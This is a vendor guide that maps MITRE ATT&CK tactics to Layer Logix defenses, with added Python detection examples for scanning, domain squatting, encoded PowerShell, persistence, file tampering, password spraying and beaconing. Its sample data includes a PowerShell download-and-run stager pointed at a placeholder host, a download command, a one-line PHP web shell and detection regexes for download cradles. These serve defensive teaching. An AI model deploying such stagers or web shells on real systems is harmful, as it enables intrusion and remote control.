MITRE ATT&CK Techniques & Protection Strategies by Layer Logix



Comprehensive Guide to MITRE ATT&CK Techniques and Layer Logix Protection Strategies

The MITRE ATT&CK framework is an essential resource for understanding the tactics and techniques adversaries use to compromise systems. By mapping out the entire lifecycle of cyberattacks, it enables organizations to anticipate threats and implement effective defenses.

Layer Logix leverages the MITRE ATT&CK framework to deliver advanced cybersecurity solutions. By understanding each attack vector in depth, Layer Logix provides tailored defenses that mitigate risks at every stage of an attack.


Reconnaissance

Attack Vector Summary: Reconnaissance involves adversaries gathering information about a target to identify potential vulnerabilities. This phase lays the groundwork for subsequent attack stages.

Techniques and Sub-Techniques

T1595 Active Scanning
- T1595.001: Scanning IP Blocks
- T1595.002: Vulnerability Scanning
- T1595.003: Wordlist Scanning

T1592 Gather Victim Host Information
- T1592.001: Hardware
- T1592.002: Software
- T1592.003: Firmware

T1589 Gather Victim Identity Information
- T1589.001: Credentials
- T1589.002: Email Addresses
- T1589.003: Employee Names

T1590 Gather Victim Network Information
- T1590.001: Domain Properties
- T1590.002: DNS
- T1590.003: Network Trust Dependencies

T1591 Gather Victim Org Information
- T1591.001: Determine Physical Locations
- T1591.002: Business Relationships
- T1591.004: Identify Roles

T1598 Phishing for Information
- T1598.001: Spearphishing Service
- T1598.002: Spearphishing Attachment
- T1598.003: Spearphishing Link

Active Scanning (T1595): Adversaries perform network scans to identify live hosts, open ports, and services running on target systems. This helps them find exploitable vulnerabilities.

Gather Victim Host Information (T1592): Collecting data about hardware, software, and firmware provides insights into potential weaknesses.

Phishing for Information (T1598): Attackers use phishing techniques to trick individuals into revealing sensitive information.

Layer Logix Protection:

Network Monitoring: Implements intrusion detection systems (IDS) and intrusion prevention systems (IPS) to detect and block unauthorized scanning activities.

Threat Intelligence Integration: Utilizes global threat intelligence to identify and respond to reconnaissance activities targeting the organization.

Employee Training: Conducts regular security awareness programs to educate staff about phishing tactics.
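The "Network Monitoring" point above is a detection rule at heart. The following is an added example, not Layer Logix code, of the logic an IDS applies to firewall deny logs to surface active scanning (T1595.001, T1595.002): one source touching many distinct host/port targets inside a short window. The log format and all IP addresses are constructed for the example.

```python
"""Flag active scanning (T1595.001 / T1595.002) in firewall deny logs.

Added example, not Layer Logix code. The log format is constructed for the
example: "<ISO timestamp> <src_ip> <dst_ip> <dst_port> <ALLOW|DENY>".
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: a fast vertical scan, a slow scan, and ordinary traffic.
_PORTS = [21, 22, 23, 25, 53, 80, 110, 135, 139, 443, 445, 3389]
SAMPLE_LOG = [
    f"2023-10-01T10:00:{i:02d} 203.0.113.5 10.0.0.7 {p} DENY"
    for i, p in enumerate(_PORTS)                      # 12 ports in 12 seconds
] + [
    f"2023-10-01T11:{i // 2:02d}:{(i % 2) * 30:02d} 203.0.113.77 10.0.0.7 {p} DENY"
    for i, p in enumerate(_PORTS)                      # same 12 ports, one every 30 s
] + [
    "2023-10-01T10:05:00 198.51.100.9 10.0.0.7 80 DENY",
    "2023-10-01T10:05:03 198.51.100.9 10.0.0.7 443 DENY",
    "2023-10-01T10:05:09 198.51.100.9 10.0.0.7 8080 DENY",
    "2023-10-01T10:06:00 192.0.2.1 10.0.0.7 443 ALLOW",
]


def parse_line(line):
    """Return (timestamp, src, dst, port, action) or None for malformed lines."""
    parts = line.split()
    if len(parts) != 5:
        return None
    try:
        return (datetime.fromisoformat(parts[0]), parts[1], parts[2], int(parts[3]), parts[4])
    except ValueError:
        return None


def detect_scanners(lines, window_seconds=60, distinct_threshold=10):
    """Map src_ip -> largest number of distinct (dst, port) targets it was denied
    on inside any sliding window of window_seconds; only sources at or above
    distinct_threshold are returned."""
    window = timedelta(seconds=window_seconds)
    events = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed and parsed[4] == "DENY":
            ts, src, dst, port, _ = parsed
            events[src].append((ts, dst, port))
    alerts = {}
    for src, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1
            targets = {(dst, port) for _, dst, port in evs[start:end + 1]}
            if len(targets) >= distinct_threshold:
                alerts[src] = max(alerts.get(src, 0), len(targets))
    return alerts


if __name__ == "__main__":
    for src, n in detect_scanners(SAMPLE_LOG).items():
        print(f"possible scan from {src}: {n} distinct targets within 60 s")
```

With the default 60-second window only the fast scanner is reported; the host probing one port every 30 seconds stays under the threshold, which is exactly why slow scans are popular. Widening the window (or aggregating per source per day) catches it at the cost of more noise from vulnerability scanners and monitoring systems, which should be allowlisted by address.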

Resource Development

Attack Vector Summary: Resource Development involves adversaries establishing the resources needed to support their operations, such as infrastructure, capabilities, or accounts.

Techniques and Sub-Techniques

T1583 Acquire Infrastructure
- T1583.001: Domains
- T1583.002: DNS Server
- T1583.003: Virtual Private Server
- T1583.005: Botnet
- T1583.007: Serverless

T1587 Develop Capabilities
- T1587.001: Malware
- T1587.002: Code Signing Certificates
- T1587.003: Digital Certificates

T1584 Compromise Infrastructure
- T1584.001: Domains
- T1584.002: DNS Server
- T1584.003: Virtual Private Server

Expanded Information:

Acquire Infrastructure (T1583): Attackers purchase or lease infrastructure to host malicious operations, making it harder to trace activities back to them.

Develop Capabilities (T1587): Creation of malware or tools that can exploit vulnerabilities in target systems.

Layer Logix Protection:

Domain Monitoring: Tracks domain registrations similar to the organization's name to detect potential spoofing.

Certificate Management: Validates code signing certificates to prevent the execution of unauthorized code.

Malware Analysis: Uses sandbox environments to analyze and detect custom-developed malware.
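The "Domain Monitoring" item above amounts to generating look-alike variants of the organization's own domain and matching them against newly registered domains (the infrastructure adversaries acquire under T1583.001). The following is an added example, not Layer Logix code: the brand domain, the homoglyph table and the registration feed are constructed for the example.

```python
"""Spot look-alike registrations of an organization's domain, the kind of
infrastructure adversaries acquire under T1583.001 (Domains).

Added example, not Layer Logix code. The brand domain, the homoglyph table and
the "newly registered domains" feed are constructed for the example.
"""

HOMOGLYPHS = {"o": "0", "l": "1", "i": "1", "e": "3", "a": "4", "s": "5", "m": "rn", "w": "vv"}


def lookalikes(label):
    """Generate single-edit variants of a DNS label: homoglyph swap, omission,
    repetition, adjacent transposition and hyphen insertion."""
    out = set()
    for i, ch in enumerate(label):
        if ch in HOMOGLYPHS:
            out.add(label[:i] + HOMOGLYPHS[ch] + label[i + 1:])
        out.add(label[:i] + label[i + 1:])             # omission
        out.add(label[:i] + ch + ch + label[i + 1:])   # repetition
        if i + 1 < len(label):
            out.add(label[:i] + label[i + 1] + ch + label[i + 2:])  # transposition
            out.add(label[:i + 1] + "-" + label[i + 1:])            # hyphenation
    out.discard(label)
    return out


def match_feed(domain, feed):
    """Return (domain, reason) for feed entries that imitate `domain`.
    Assumes `domain` is a registrable name (label.tld); reduce multi-label
    feed entries to their registrable part before calling this."""
    label, _, tld = domain.lower().partition(".")
    variants = lookalikes(label)
    hits = []
    for entry in feed:
        entry = entry.lower().rstrip(".")
        el, _, etld = entry.partition(".")
        if el == label and etld != tld:
            hits.append((entry, "same label, different TLD"))
        elif el in variants:
            hits.append((entry, "look-alike label"))
        elif el != label and label in el:
            hits.append((entry, "contains brand label"))
    return hits


# Constructed feed of "newly registered" domains for the example.
FEED = ["layerlogix.net", "layerl0gix.com", "layerlogx.com",
        "layerlogix-support.com", "example.org", "layer-logix.com", "LayerLogix.com"]

if __name__ == "__main__":
    for entry, reason in match_feed("layerlogix.com", FEED):
        print(f"{entry}: {reason}")
```

Single-edit variants are enough to catch most opportunistic squats; production tooling also generates multi-edit, bitsquat and IDN-homograph variants and checks each hit for MX records or a live certificate, since a parked look-alike is a far lower priority than one that can already receive mail.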

Initial Access

Attack Vector Summary: Initial Access techniques are used by adversaries to penetrate a target network and establish a foothold.

Techniques and Sub-Techniques

T1566 Phishing
- T1566.001: Spearphishing Attachment
- T1566.002: Spearphishing Link
- T1566.003: Spearphishing via Service

T1190 Exploit Public-Facing Application - N/A

T1195 Supply Chain Compromise
- T1195.001: Compromise Software Dependencies and Development Tools
- T1195.002: Compromise Software Supply Chain
- T1195.003: Compromise Hardware Supply Chain

T1091 Replication Through Removable Media - N/A

Expanded Information:

Phishing (T1566): Adversaries craft deceptive emails or messages to trick users into divulging credentials or downloading malware.

Exploit Public-Facing Application (T1190): Attackers target vulnerabilities in internet-facing applications to gain unauthorized access.

Layer Logix Protection:

Email Security: Implements advanced email filtering and anti-phishing technologies to detect and block malicious emails.

Web Application Firewalls (WAF): Protects public-facing applications from exploitation by filtering and monitoring HTTP traffic.

Supply Chain Security: Evaluates and monitors third-party vendors to mitigate supply chain risks.

Execution

Attack Vector Summary: Execution techniques involve adversaries running malicious code on victim systems, which is crucial for carrying out further actions.

Techniques and Sub-Techniques

T1059 Command and Scripting Interpreter
- T1059.001: PowerShell
- T1059.003: Windows Command Shell
- T1059.004: Unix Shell
- T1059.005: Visual Basic
- T1059.006: Python

T1204 User Execution
- T1204.001: Malicious Link
- T1204.002: Malicious File

T1047 Windows Management Instrumentation - N/A

T1569 System Services
- T1569.002: Service Execution

T1106 Native API - N/A

Expanded Information:

Command and Scripting Interpreter (T1059): Adversaries use interpreters already present on the host (PowerShell, cmd.exe, Unix shells, Python) to execute code, which blends in with legitimate administration and makes detection harder.

User Execution (T1204): Relies on social engineering to persuade users to run malicious code.

Layer Logix Protection:

Application Control: Enforces policies that restrict the execution of unauthorized scripts and applications.

Behavioral Analytics: Detects anomalous usage of scripting tools and command-line interfaces.

User Education: Provides training to help users identify and avoid executing malicious content.
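The "Behavioral Analytics" point above is where T1059.001 is usually caught: process-creation events carry the full PowerShell command line, and a -EncodedCommand argument is just base64 of UTF-16LE text that can be decoded and scored like any other command. The following is an added example, not Layer Logix code, of that decode-and-score step; the three events and the indicator list are constructed for the example.

```python
"""Decode and score PowerShell command lines from process-creation events
(T1059.001), including -EncodedCommand payloads (T1027).

Added example, not Layer Logix code. The events and the indicator list are
constructed for the example; real deployments tune the indicators against
their own baseline of administrative scripts.
"""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the common ones.
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

INDICATORS = {
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "base64_in_clear": re.compile(r"FromBase64String", re.I),
}


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (UTF-16LE), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline):
    """Return {"decoded": str|None, "indicators": [names]} for one command line.
    Indicators are matched against the visible command line and the decoded payload."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + " " + decoded
    hits = {name for name, rx in INDICATORS.items() if rx.search(text)}
    if decoded is not None:
        hits.add("encoded_command")
    return {"decoded": decoded, "indicators": sorted(hits)}


# Constructed events. The encoded payload is built here so the example is self-contained.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
_PAYLOAD = base64.b64encode(STAGER.encode("utf-16-le")).decode()
EVENTS = [
    'powershell.exe -Command "Get-Service -Name Spooler"',
    f"powershell.exe -nop -w hidden -enc {_PAYLOAD}",
    'powershell -ep bypass -c "iwr http://example.invalid/x -OutFile x.exe"',
]

if __name__ == "__main__":
    for event in EVENTS:
        result = analyze(event)
        print(result["indicators"] or "clean", "|", result["decoded"] or event[:60])
```

Script block logging (Event ID 4104) records the de-obfuscated script as PowerShell runs it and is the better source where it is enabled; command-line decoding is the fallback for hosts that only ship process-creation events.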

Persistence

Attack Vector Summary: Persistence techniques allow adversaries to maintain access to systems across reboots and credential changes, ensuring long-term control.

Techniques and Sub-Techniques

T1547 Boot or Logon Autostart Execution
- T1547.001: Registry Run Keys / Startup Folder
- T1547.004: Winlogon Helper DLL
- T1547.005: Security Support Provider
- T1547.006: Kernel Modules and Extensions

T1053 Scheduled Task/Job
- T1053.002: At
- T1053.003: Cron
- T1053.005: Scheduled Task

T1574 Hijack Execution Flow
- T1574.001: DLL Search Order Hijacking
- T1574.002: DLL Side-Loading
- T1574.007: Path Interception by PATH Environment Variable
- T1574.008: Path Interception by Search Order Hijacking
- T1574.009: Path Interception by Unquoted Path

T1505 Server Software Component
- T1505.001: SQL Stored Procedures
- T1505.003: Web Shell

T1098 Account Manipulation
- T1098.001: Additional Cloud Credentials
- T1098.004: SSH Authorized Keys

Expanded Information:

Boot or Logon Autostart Execution (T1547): Modifying system settings so malicious code runs automatically at startup or logon.

Scheduled Task/Job (T1053): Creating tasks that execute code at predetermined times.

Layer Logix Protection:

Startup Monitoring: Watches for changes in registry keys and startup folders.

Task Scheduler Monitoring: Detects unauthorized scheduled tasks and jobs.

Endpoint Protection: Employs endpoint detection and response (EDR) tools to identify persistence mechanisms.
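"Startup Monitoring" and "Task Scheduler Monitoring" above both reduce to the same check: compare the host's current autostart inventory against a known-good baseline and look hard at anything new. The following is an added example, not Layer Logix code, of that comparison for Run keys (T1547.001), cron (T1053.003) and scheduled tasks (T1053.005); the two inventories and the path and interpreter patterns are constructed for the example.

```python
"""Compare two autostart inventories and flag new or changed entries
(T1547.001 Run keys, T1053.003 Cron, T1053.005 Scheduled Task).

Added example, not Layer Logix code. The snapshots are constructed; in practice
the "current" list is collected from the registry, schtasks and crontab files
of the host and the baseline from a known-good build.
"""
import re

# Paths a user can write without admin rights, and interpreters commonly used
# to launch payloads. Both patterns are illustrative, not exhaustive.
USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|Users\\Public|Downloads|ProgramData)\\|/tmp/|/dev/shm/|/home/", re.I)
SCRIPT_HOST = re.compile(r"\b(?:powershell|pwsh|wscript|cscript|mshta|rundll32|regsvr32|cmd|bash|sh|python)(?:\.exe)?\b", re.I)

BASELINE = [
    {"type": "run_key", "name": "OneDrive", "command": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe /background"},
    {"type": "schtask", "name": r"\Microsoft\Windows\Defrag\ScheduledDefrag", "command": r"%windir%\system32\defrag.exe -c -h -k -g"},
    {"type": "cron", "name": "root", "command": "0 3 * * * /usr/bin/apt-get update"},
]
CURRENT = BASELINE + [
    {"type": "run_key", "name": "Updater", "command": r"powershell.exe -w hidden -File C:\Users\alice\AppData\Roaming\upd.ps1"},
    {"type": "cron", "name": "www-data", "command": "*/5 * * * * /tmp/.x/beacon"},
]


def diff_autostarts(baseline, current):
    """Return findings for entries in `current` that are absent from or differ
    from `baseline`, with the reasons that make each one worth a look."""
    base_cmds = {(e["type"], e["name"].lower()): e["command"] for e in baseline}
    findings = []
    for e in current:
        key = (e["type"], e["name"].lower())
        if key in base_cmds and base_cmds[key] == e["command"]:
            continue
        reasons = ["changed command" if key in base_cmds else "new entry"]
        if USER_WRITABLE.search(e["command"]):
            reasons.append("runs from user-writable path")
        if SCRIPT_HOST.search(e["command"]):
            reasons.append("launches a script host")
        findings.append({"type": e["type"], "name": e["name"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in diff_autostarts(BASELINE, CURRENT):
        print(f"{f['type']} {f['name']}: {', '.join(f['reasons'])}")
```

The baseline must be refreshed after legitimate software installs, or every update becomes an alert; the two enrichment reasons exist so that a new entry pointing at a signed binary under Program Files ranks below one that starts PowerShell from a profile directory.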

Privilege Escalation

Attack Vector Summary: Privilege Escalation techniques are used to gain higher-level permissions, enabling adversaries to perform actions that require elevated privileges.

Techniques and Sub-Techniques

T1068 Exploitation for Privilege Escalation - N/A

T1055 Process Injection
- T1055.001: Dynamic-link Library Injection
- T1055.002: Portable Executable Injection
- T1055.003: Thread Execution Hijacking

T1078 Valid Accounts
- T1078.001: Default Accounts
- T1078.002: Domain Accounts
- T1078.003: Local Accounts

T1548 Abuse Elevation Control Mechanism
- T1548.002: Bypass User Account Control
- T1548.003: Sudo and Sudo Caching

T1134 Access Token Manipulation
- T1134.001: Token Impersonation/Theft
- T1134.002: Create Process with Token

Expanded Information:

Exploitation for Privilege Escalation (T1068): Exploiting vulnerabilities to gain elevated permissions.

Process Injection (T1055): Injecting malicious code into legitimate processes.

Layer Logix Protection:

Vulnerability Management: Regularly scans and patches systems to eliminate known vulnerabilities.

Memory Protection: Uses anti-exploitation tools to prevent process injection and other in-memory attacks.

Access Control Policies: Enforces the principle of least privilege to limit user permissions.

Defense Evasion

Attack Vector Summary: Defense Evasion techniques help adversaries avoid detection by security controls so that their activities go unnoticed.

Techniques and Sub-Techniques

T1027 Obfuscated Files or Information
- T1027.001: Binary Padding
- T1027.002: Software Packing
- T1027.003: Steganography

T1562 Impair Defenses
- T1562.001: Disable or Modify Tools
- T1562.002: Disable Windows Event Logging

T1070 Indicator Removal
- T1070.001: Clear Windows Event Logs
- T1070.004: File Deletion
- T1070.006: Timestomp

T1036 Masquerading
- T1036.003: Rename System Utilities
- T1036.005: Match Legitimate Name or Location

T1497 Virtualization/Sandbox Evasion
- T1497.001: System Checks
- T1497.002: User Activity Based Checks

Expanded Information:

Obfuscated Files or Information (T1027): Hiding malicious code using techniques like encryption or encoding.

Impair Defenses (T1562): Disabling security tools to prevent detection.

Layer Logix Protection:

Advanced Threat Detection: Employs machine learning to detect obfuscated malware.

Security Tool Monitoring: Alerts administrators if security tools are disabled or modified.

Integrity Checks: Uses file integrity monitoring to detect unauthorized changes.
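The "Integrity Checks" item above is the control that survives the indicator-removal techniques listed in this section: a hash-based monitor notices a replaced binary even when its timestamps have been restored (T1070.006) and notices a log that has disappeared (T1070.004). The following is an added example, not Layer Logix code; it builds a throwaway directory tree in a temp dir so it runs offline, and the file names and contents are constructed.

```python
"""Hash-based file integrity monitoring: baseline a tree, then report added,
deleted and modified files, including a modification whose timestamp was
restored (T1070.006 Timestomp) and a deleted log (T1070.004 File Deletion).

Added example, not Layer Logix code. It builds a throwaway directory tree
in a temp dir so it runs offline; the file names and contents are constructed.
"""
import hashlib
import os
import pathlib
import tempfile


def hash_file(path, chunk_size=1 << 16):
    """SHA-256 of a file, read in chunks so large files do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """Map relative path -> (sha256, mtime_ns) for every regular file under root."""
    root = pathlib.Path(root)
    return {
        p.relative_to(root).as_posix(): (hash_file(p), p.stat().st_mtime_ns)
        for p in sorted(root.rglob("*")) if p.is_file()
    }


def compare(baseline, current):
    """Diff two snapshots. A content change with an unchanged mtime is called out
    separately: that is what a timestomp looks like to a hash-based monitor."""
    added = sorted(set(current) - set(baseline))
    deleted = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline.keys() & current.keys() if baseline[p][0] != current[p][0])
    mtime_preserved = [p for p in modified if baseline[p][1] == current[p][1]]
    return {"added": added, "deleted": deleted, "modified": modified, "mtime_preserved": mtime_preserved}


def demo():
    """Build a tree, baseline it, tamper with it, and return the comparison."""
    with tempfile.TemporaryDirectory() as tmp:
        root = pathlib.Path(tmp)
        files = {"etc/sshd_config": b"PermitRootLogin no\n",
                 "bin/svc": b"\x7fELF original service binary\n",
                 "var/log/auth.log": b"Oct  1 10:00:00 sshd: Accepted publickey for alice\n"}
        for rel, data in files.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_bytes(data)
        baseline = snapshot(root)

        # Tampering: config edit, log deletion (T1070.004), dropped web shell
        # (T1505.003) and a replaced binary with its mtime restored (T1070.006).
        cfg = root / "etc/sshd_config"
        cfg.write_bytes(b"PermitRootLogin yes\n")
        st = cfg.stat()  # push the edit 60 s later so coarse-timestamp filesystems still show a change
        os.utime(cfg, ns=(st.st_atime_ns, st.st_mtime_ns + 60 * 10**9))
        (root / "var/log/auth.log").unlink()
        (root / "www").mkdir()
        (root / "www/shell.php").write_bytes(b"<?php system($_GET['c']); ?>\n")
        svc = root / "bin/svc"
        before = svc.stat()
        svc.write_bytes(b"\x7fELF trojanized service binary\n")
        os.utime(svc, ns=(before.st_atime_ns, before.st_mtime_ns))  # timestomp

        return compare(baseline, snapshot(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

The baseline itself must live somewhere the monitored host cannot rewrite (a signed store or a separate server), otherwise an attacker with root simply re-baselines after tampering.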

Credential Access

Attack Vector Summary: Credential Access techniques involve stealing account names and credentials such as passwords, hashes, and tokens, allowing adversaries to gain unauthorized access to systems and data.

Techniques and Sub-Techniques

T1003 OS Credential Dumping
- T1003.001: LSASS Memory
- T1003.002: Security Account Manager
- T1003.003: NTDS
- T1003.004: LSA Secrets

T1110 Brute Force
- T1110.001: Password Guessing
- T1110.002: Password Cracking
- T1110.003: Password Spraying

T1056 Input Capture
- T1056.001: Keylogging
- T1056.002: GUI Input Capture

T1555 Credentials from Password Stores
- T1555.001: Keychain
- T1555.003: Credentials from Web Browsers

T1528 Steal Application Access Token - N/A

Expanded Information:

OS Credential Dumping (T1003): Extracting credentials from operating system components.

Brute Force (T1110): Repeatedly trying candidate passwords, whether by guessing against live accounts, cracking captured hashes offline, or spraying a few common passwords across many accounts.
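Password spraying (T1110.003) is designed to stay under per-account lockout thresholds, so it has to be detected per source rather than per account. The following is an added example, not Layer Logix code, of that rule applied to authentication log lines; the log format, account names and addresses are constructed for the example.

```python
"""Detect password spraying (T1110.003): one source trying a few passwords
against many accounts, which per-account lockout thresholds never see.

Added example, not Layer Logix code. The auth log format is constructed:
"<ISO timestamp> <OK|FAIL> user=<account> src=<ip>".
"""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

LINE = re.compile(r"^(\S+) (OK|FAIL) user=(\S+) src=(\S+)$")

SPRAY_SRC = "203.0.113.20"
_USERS = ["asmith", "bjones", "cwong", "dsmith", "efox", "gkhan", "hlee", "imoore"]
SAMPLE_LOG = (
    [f"2023-10-01T02:{i:02d}:00 FAIL user={u} src={SPRAY_SRC}" for i, u in enumerate(_USERS)]  # one try per account
    + [f"2023-10-01T02:09:00 OK user=dsmith src={SPRAY_SRC}"]                                   # one password worked
    + [f"2023-10-01T09:00:{i:02d} FAIL user=admin src=198.51.100.7" for i in range(10)]         # single-account brute force
    + ["2023-10-01T08:30:00 FAIL user=jroe src=10.0.0.55",
       "2023-10-01T08:30:20 FAIL user=jroe src=10.0.0.55",
       "2023-10-01T08:30:40 OK user=jroe src=10.0.0.55"]                                        # a typo, then success
)


def detect_spraying(lines, window_minutes=30, min_accounts=5, max_per_account=3):
    """Return alerts for sources whose failures in any window span at least
    min_accounts distinct accounts with no account tried more than
    max_per_account times; each alert lists accounts that later succeeded
    from that same source."""
    window = timedelta(minutes=window_minutes)
    fails = defaultdict(list)
    successes = defaultdict(set)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ts, result, user, src = datetime.fromisoformat(m.group(1)), m.group(2), m.group(3), m.group(4)
        if result == "FAIL":
            fails[src].append((ts, user))
        else:
            successes[src].add(user)
    alerts = []
    for src, evs in fails.items():
        evs.sort()
        start, peak = 0, 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1
            per_account = Counter(u for _, u in evs[start:end + 1])
            if len(per_account) >= min_accounts and max(per_account.values()) <= max_per_account:
                peak = max(peak, len(per_account))
        if peak:
            alerts.append({"src": src, "accounts": peak, "later_succeeded": sorted(successes[src])})
    return alerts


if __name__ == "__main__":
    for a in detect_spraying(SAMPLE_LOG):
        print(f"spray from {a['src']}: {a['accounts']} accounts, succeeded on {a['later_succeeded']}")
```

The single-account brute force in the sample (T1110.001) is deliberately not reported here; it is the case the per-account lockout rule already covers. A spray spread across many source addresses defeats this grouping too, which is why cloud identity providers correlate on the failed-password pattern and timing rather than the source alone.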

Layer Logix Protection:

Credential Management: Implements strong password policies and regular password changes.

Multi-Factor Authentication (MFA): Adds an extra layer of security beyond passwords.

Anomaly Detection: Monitors for unusual login patterns indicative of credential theft.

Discovery

Attack Vector Summary: Discovery techniques enable adversaries to gain knowledge about the system and network, facilitating further exploitation.

Techniques and Sub-Techniques

T1083 File and Directory Discovery

T1016 System Network Configuration Discovery

Expanded Information:

File and Directory Discovery (T1083): Searching for files that may contain valuable data.

System Network Configuration Discovery (T1016): Gathering information about network interfaces and settings.

Layer Logix Protection:

Access Controls: Restricts user permissions to limit access to system information.

Monitoring Tools: Detects and alerts on the use of system commands commonly used for discovery.

Lateral Movement

Attack Vector Summary: Lateral Movement techniques allow adversaries to move through a network to access additional resources and systems.

Techniques and Sub-Techniques

T1021 Remote Services
- T1021.001: Remote Desktop Protocol
- T1021.002: SMB/Windows Admin Shares
- T1021.003: Distributed Component Object Model (DCOM)

T1072 Software Deployment Tools - N/A

T1210 Exploitation of Remote Services - N/A

T1563 Remote Service Session Hijacking
- T1563.001: SSH Hijacking
- T1563.002: RDP Hijacking

Expanded Information:

Remote Services (T1021): Using legitimate remote services to access other systems.

Remote Service Session Hijacking (T1563): Taking over existing remote sessions.

Layer Logix Protection:

Network Segmentation: Divides the network into segments to limit lateral movement.

Access Monitoring: Logs and reviews remote access attempts.

Zero Trust Architecture: Verifies every access request, regardless of origin.

Collection

Attack Vector Summary: Collection techniques involve gathering data of interest from target systems for exfiltration.

Techniques and Sub-Techniques

T1005 Data from Local System - N/A

T1039 Data from Network Shared Drive - N/A

T1056 Input Capture
- T1056.001: Keylogging
- T1056.002: GUI Input Capture

T1119 Automated Collection - N/A

Expanded Information:

Data from Local System (T1005): Collecting files from the local system that may contain sensitive information.

Automated Collection (T1119): Using scripts or tools to automatically collect data over time.

Layer Logix Protection:

Data Access Controls: Implements strict permissions on sensitive files.

DLP Solutions: Monitors and controls the movement of sensitive data.

Encryption: Protects data at rest and in transit.

Command and Control

Attack Vector Summary: Command and Control (C2) techniques are used by adversaries to communicate with compromised systems and control them remotely.

Techniques and Sub-Techniques

T1071 Application Layer Protocol
- T1071.001: Web Protocols
- T1071.002: File Transfer Protocols
- T1071.003: Mail Protocols

T1095 Non-Application Layer Protocol - N/A

T1573 Encrypted Channel
- T1573.001: Symmetric Cryptography
- T1573.002: Asymmetric Cryptography

T1001 Data Obfuscation
- T1001.001: Junk Data
- T1001.002: Steganography

T1105 Ingress Tool Transfer - N/A

Expanded Information:

Application Layer Protocol (T1071): Using standard protocols to blend malicious traffic with legitimate network traffic.

Encrypted Channel (T1573): Encrypting C2 communications to evade detection.

Layer Logix Protection:

Network Traffic Analysis: Uses deep packet inspection to detect anomalies in network traffic.

SSL/TLS Inspection: Decrypts and inspects encrypted traffic for malicious content.

C2 Blacklisting: Maintains updated lists of known malicious C2 servers.
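Where TLS inspection is not possible and the destination is not on any blocklist, the "Network Traffic Analysis" item above still has timing to work with: an implant polling its server sleeps for a fixed interval plus a little jitter, which shows up as connections at near-constant spacing. The following is an added example, not Layer Logix code, of that beaconing check over connection metadata (timestamp, source, destination), which is available even for T1573 encrypted channels; the connection records are constructed for the example.

```python
"""Beaconing detection: a host that contacts one external destination at
near-constant intervals, the pattern left by C2 over web protocols
(T1071.001) even when the channel is encrypted (T1573).

Added example, not Layer Logix code. The connection records (epoch seconds,
source, destination) are constructed.
"""
from collections import defaultdict
from statistics import mean, pstdev


def beacon_candidates(conns, min_conns=8, max_cv=0.2):
    """Return (src, dst, count, mean_gap_s, cv) for src/dst pairs with at least
    min_conns connections whose inter-arrival coefficient of variation
    (stdev / mean) is at most max_cv; a low cv means a regular beat."""
    by_pair = defaultdict(list)
    for t, src, dst in conns:
        by_pair[(src, dst)].append(t)
    out = []
    for (src, dst), times in by_pair.items():
        if len(times) < min_conns:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        m = mean(gaps)
        if m <= 0:
            continue
        cv = pstdev(gaps) / m
        if cv <= max_cv:
            out.append((src, dst, len(times), round(m, 1), round(cv, 3)))
    return sorted(out)


def _series(src, dst, start, gaps):
    """Expand a list of gaps into connection records starting at `start`."""
    t, recs = start, [(start, src, dst)]
    for g in gaps:
        t += g
        recs.append((t, src, dst))
    return recs


# Constructed traffic: an implant with a ~60 s sleep and small jitter, a person
# browsing, and an hourly update check (periodic but legitimate).
CONNS = (
    _series("10.0.0.21", "203.0.113.9", 1_696_150_000, [58, 61, 60, 59, 62, 60, 58, 61, 60, 59, 60])
    + _series("10.0.0.21", "198.51.100.3", 1_696_150_000, [3, 120, 7, 400, 12, 2, 900, 15, 40, 6])
    + _series("10.0.0.30", "192.0.2.50", 1_696_150_000, [3600] * 9)
)

if __name__ == "__main__":
    for src, dst, n, gap, cv in beacon_candidates(CONNS):
        print(f"{src} -> {dst}: {n} connections, every {gap}s, cv={cv}")
```

The hourly update check is reported alongside the implant, and that is the honest result: legitimate software beacons too. The check is a candidate generator, and its output is ranked by how new the destination is, whether the byte counts are also constant, and whether the destination appears in an allowlist of known telemetry and update services. Implants with large jitter push cv above the threshold, so production detectors also look at the spread of the gap distribution rather than a single ratio.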

Exfiltration

Attack Vector Summary: Exfiltration techniques are methods used to transfer data out of the target network, often covertly.

Techniques and Sub-Techniques

T1041 Exfiltration Over C2 Channel - N/A

T1011 Exfiltration Over Other Network Medium
- T1011.001: Exfiltration Over Bluetooth

T1567 Exfiltration Over Web Service
- T1567.001: Exfiltration to Cloud Storage
- T1567.002: Exfiltration to Code Repository

T1052 Exfiltration Over Physical Medium
- T1052.001: Exfiltration over USB

T1020 Automated Exfiltration
- T1020.001: Traffic Duplication

Expanded Information:

